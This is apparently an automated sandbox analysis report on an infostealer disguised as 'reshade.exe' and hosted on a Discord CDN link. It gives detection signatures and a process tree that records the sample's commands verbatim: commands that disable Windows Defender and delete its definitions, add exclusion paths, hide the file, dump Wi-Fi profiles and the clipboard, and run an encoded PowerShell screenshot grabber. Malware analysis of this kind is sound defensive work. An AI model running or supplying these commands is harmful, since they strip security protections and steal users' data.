Analysis

  • max time kernel
    147s
  • max time network
    278s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-05-2024 12:17

General

  • Target

    https://cdn.discordapp.com/attachments/1234958894225162311/1238820979413745685/reshade.exe?ex=6640ad71&is=663f5bf1&hm=e51dc315447a6523e4236d2351043ff9ad9363ef9c92eb0ee4848bac1ab9a542&

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 3 IoCs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 32 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 64 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 16 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 27 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 36 IoCs
  • Suspicious use of SendNotifyMessage 26 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://cdn.discordapp.com/attachments/1234958894225162311/1238820979413745685/reshade.exe?ex=6640ad71&is=663f5bf1&hm=e51dc315447a6523e4236d2351043ff9ad9363ef9c92eb0ee4848bac1ab9a542&
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4400
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb2a33ab58,0x7ffb2a33ab68,0x7ffb2a33ab78
      2⤵
        PID:408
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1644 --field-trial-handle=1872,i,12812521554618727973,12659033005266298930,131072 /prefetch:2
        2⤵
          PID:3376
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1872,i,12812521554618727973,12659033005266298930,131072 /prefetch:8
          2⤵
            PID:2368
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2224 --field-trial-handle=1872,i,12812521554618727973,12659033005266298930,131072 /prefetch:8
            2⤵
              PID:2624
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3040 --field-trial-handle=1872,i,12812521554618727973,12659033005266298930,131072 /prefetch:1
              2⤵
                PID:2748
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3048 --field-trial-handle=1872,i,12812521554618727973,12659033005266298930,131072 /prefetch:1
                2⤵
                  PID:1832
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4640 --field-trial-handle=1872,i,12812521554618727973,12659033005266298930,131072 /prefetch:8
                  2⤵
                    PID:2104
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4608 --field-trial-handle=1872,i,12812521554618727973,12659033005266298930,131072 /prefetch:8
                    2⤵
                      PID:3332
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5004 --field-trial-handle=1872,i,12812521554618727973,12659033005266298930,131072 /prefetch:8
                      2⤵
                        PID:804
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5140 --field-trial-handle=1872,i,12812521554618727973,12659033005266298930,131072 /prefetch:8
                        2⤵
                          PID:3388
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5012 --field-trial-handle=1872,i,12812521554618727973,12659033005266298930,131072 /prefetch:8
                          2⤵
                            PID:2944
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4904 --field-trial-handle=1872,i,12812521554618727973,12659033005266298930,131072 /prefetch:8
                            2⤵
                              PID:4580
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4880 --field-trial-handle=1872,i,12812521554618727973,12659033005266298930,131072 /prefetch:8
                              2⤵
                                PID:3528
                              • C:\Users\Admin\Downloads\reshade.exe
                                "C:\Users\Admin\Downloads\reshade.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:1188
                                • C:\Users\Admin\Downloads\reshade.exe
                                  "C:\Users\Admin\Downloads\reshade.exe"
                                  3⤵
                                  • Drops file in Drivers directory
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:3196
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\reshade.exe'"
                                    4⤵
                                      PID:2416
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\reshade.exe'
                                        5⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4580
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                      4⤵
                                        PID:2320
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                          5⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1392
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                        4⤵
                                          PID:2488
                                          • C:\Windows\system32\tasklist.exe
                                            tasklist /FO LIST
                                            5⤵
                                            • Enumerates processes with tasklist
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3564
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                          4⤵
                                            PID:732
                                            • C:\Windows\System32\Wbem\WMIC.exe
                                              wmic csproduct get uuid
                                              5⤵
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:3704
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                                            4⤵
                                              PID:1436
                                              • C:\Windows\system32\reg.exe
                                                REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                                                5⤵
                                                  PID:1040
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                                                4⤵
                                                  PID:4116
                                                  • C:\Windows\system32\reg.exe
                                                    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                                                    5⤵
                                                      PID:4484
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                    4⤵
                                                      PID:2948
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic path win32_VideoController get name
                                                        5⤵
                                                        • Detects videocard installed
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3432
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                      4⤵
                                                        PID:5088
                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                          wmic path win32_VideoController get name
                                                          5⤵
                                                          • Detects videocard installed
                                                          PID:3328
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\Downloads\reshade.exe""
                                                        4⤵
                                                          PID:4476
                                                          • C:\Windows\system32\attrib.exe
                                                            attrib +h +s "C:\Users\Admin\Downloads\reshade.exe"
                                                            5⤵
                                                            • Views/modifies file attributes
                                                            PID:2448
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‏‌ .scr'"
                                                          4⤵
                                                            PID:764
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‏‌ .scr'
                                                              5⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:3296
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                            4⤵
                                                              PID:2896
                                                              • C:\Windows\system32\tasklist.exe
                                                                tasklist /FO LIST
                                                                5⤵
                                                                • Enumerates processes with tasklist
                                                                PID:4784
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                              4⤵
                                                                PID:4348
                                                                • C:\Windows\system32\tasklist.exe
                                                                  tasklist /FO LIST
                                                                  5⤵
                                                                  • Enumerates processes with tasklist
                                                                  PID:4768
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                4⤵
                                                                  PID:2444
                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                    5⤵
                                                                      PID:5380
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                    4⤵
                                                                      PID:3508
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell Get-Clipboard
                                                                        5⤵
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:5572
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                      4⤵
                                                                        PID:3696
                                                                        • C:\Windows\system32\tasklist.exe
                                                                          tasklist /FO LIST
                                                                          5⤵
                                                                          • Enumerates processes with tasklist
                                                                          PID:5580
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                        4⤵
                                                                          PID:2336
                                                                          • C:\Windows\system32\tree.com
                                                                            tree /A /F
                                                                            5⤵
                                                                              PID:5592
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                            4⤵
                                                                              PID:4512
                                                                              • C:\Windows\System32\Conhost.exe
                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                5⤵
                                                                                  PID:3564
                                                                                • C:\Windows\system32\netsh.exe
                                                                                  netsh wlan show profile
                                                                                  5⤵
                                                                                    PID:5564
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                  4⤵
                                                                                    PID:4592
                                                                                    • C:\Windows\system32\systeminfo.exe
                                                                                      systeminfo
                                                                                      5⤵
                                                                                      • Gathers system information
                                                                                      PID:5548
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                                                                    4⤵
                                                                                      PID:2916
                                                                                      • C:\Windows\system32\reg.exe
                                                                                        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                                                                        5⤵
                                                                                          PID:5688
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                        4⤵
                                                                                          PID:4124
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAA